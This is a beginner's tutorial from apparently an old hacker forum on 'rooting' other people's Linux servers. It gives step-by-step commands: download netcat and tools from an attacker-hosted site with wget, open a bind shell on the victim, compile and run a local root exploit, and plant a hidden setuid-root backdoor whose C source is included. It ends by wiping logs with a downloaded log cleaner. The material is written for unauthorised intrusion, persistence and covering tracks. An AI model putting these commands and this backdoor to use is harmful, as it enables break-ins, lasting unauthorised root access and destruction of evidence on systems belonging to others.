Rooting Unix Boxes For Beginners
Tutorial Writen By cyb3r pr3dat0r
root@shell~#
Hello and welcome to dna-stuxnet tutorial on Rooting unix boxes.
Today we will learn a few fundementals on what it takes to
root a your box! In Todays Tutorial we will be using a linux
box.
Required for this tutorial:
Code:
Access to a shell - Upload by any-means a shell onto a box
mig-log cleaner - http://b14ck1c3.freehostia.com/miglc
Netcat - http://www.vulnwatch.org/netcat/nc111nt.zip
Netcat(unix) - http://b14ck1c3.freehostia.com/nc
Local root Exploit - http://jshooter.by.ru/xpl/
half a brain
willingness to learn
Now that you have all that in order lets begin.
Go to the path of or access your shell by whatever means nessecary.
Make sure that your shell is in a writable folder just to make things
easy for us. In our case today for this tutorial we will be using
storm7shell or gny not exactly my favorite but will get the job done none the less.
An example of this location would be something like:
Code:
http://target/youshell.php
Now that we are on your shells page we want to find out what os this box is
running and what version the kernel is. In our case it's linux 2.6.8. So we
will want to find a local root exploit for this kernel version of the linux os.
What we want to do now that we have our local root exploit for our kernel
is spawn a shell so that we can talk to the victim's box and run our commands
without interuption, But how are we suppose to do that? This can be done by
using a tool called Netcat. So now that we have a copy of Netcat we will go to
the shell, Find the command execution area of the shell and enter:
Code:
wget http://b14ck1c3.freehostia.com/nc
What this will do is download the file of Netcat i have pre-compiled and hosted
for you onto the victim box to the location of your shell. Once we have the download
complete we will want to chmod it so that our user has access to run it. which can
be done by entering:
Code:
chmod +x nc
What this does is grants everyone (user, group and other) execute permission, and the
command to the file nc which we had just previously downloaded onto the box with the
wget command.
Now that we have nc installed on both the victim machine and your own it's time to make
our connection. How Do we make a connection with nc? In the command execution area of your
shell enter:
Code:
./nc -l -p 8080 -e /bin/sh
(shell can be /bin/sh or cmd.exe for example)
And then on the netcat installed on your pc you will want to enter:
Code:
nc VictimIP Port *in our case 8080*
eg 123.123.123.123 8080
What this will do is cause the netcat on the victims box to listen on port 8080 and shovel
back an interactive shell for you once you make the connection from which you typed:
Code:
nc victimip port
Now that We have our interactive shell spawned we can start to prepare the box for Rooting.
First we will want to get our local root exploit onto the box and get it compiled if it's
not already. This can be done by once again using that nifty wget command we learned about
in the previous steps.
Code:
wget http://yoursite/xpl
What we have done is now downloaded your exploit. If your exploit is not already compiled you
will need to compile it in order to run it. Compiling your exploit can be done by using the gcc,
like so:
Code:
gcc xpl.c -o xpl;chmod +x xpl
This will compile your xpl.c and output it into a file called xpl wich will be the compiled copy
of your exploit and then chmod xpl. Now you are ready to run your exploit and get your root on.
The exploit will vary on their usage so make sure you have an understanding of the root exploit
you are using. You can run your xpl file by entering in:
Code:
./xpl
Wait until your exploit is finished running once it is done enter:
Code:
whoami
What the whoami command does is tells you who you are if this tells you root then you xpl has done
it's job and you now have root priv's on the box. or you can type:
Code:
id
which will give you something like:
Code:
uid=0(root) gid=0(root) groups=500(apache) or something similar
And now you can do your happy dance.
Now that we have rooted the box and finished humiliating ourselves by dancing around we want to make
sure that we can come and go as we please without all the hassel of Rooting the box over and over. So
we will want to create some kind of backdoor.
we can make this happen with few lines of code:
Code:
#include
#include
#include
#include
int main( void )
{
setuid( 0 );
system( "/bin/bash" );
return 0;
}
Compile it and change permissions:
Code:
root@foobar /root# gcc -o .bkdr main.c
root@foobar /root# chown root:root .bkdr
root@foobar /root# chmod +s .bkdr
Now, all you have to do is put .bkdr somewhere on the system where you can execute it (preferrably
in the $PATH) and if you execute it as another user:
Code:
raif@foobar /home/raif$ /usr/local/bin/.bkdr
root@foobar /home/raif# whoami
root
Now you have your access back.
Alright we are almost completed our mission we have successfully rooted our victims box created our
backdoor now all we need to do is wipe our tracks that we left in the logs and be on our way. This
can be done by using a log cleaner of some kind. For this tutorial we used mig-log cleaner. which you
can get here:
Code:
http://b14ck1c3.freehostia.com/miglc
Once again we can use our wget command to upload our logcleaner to the rooted box.
Code:
wget http://b14ck1c3.freehostia.com/miglc;chmod +x miglc
now just run the logcleaner
Code:
./miglc
The mig-log Cleaner has a wide variety of functions which are displayed when you run the log cleaner
so you may choose how exactly you want to clean the logs with the commands given to you. I hope you
enjoyed my tutorial and learned something from it as well. Good luck to you all.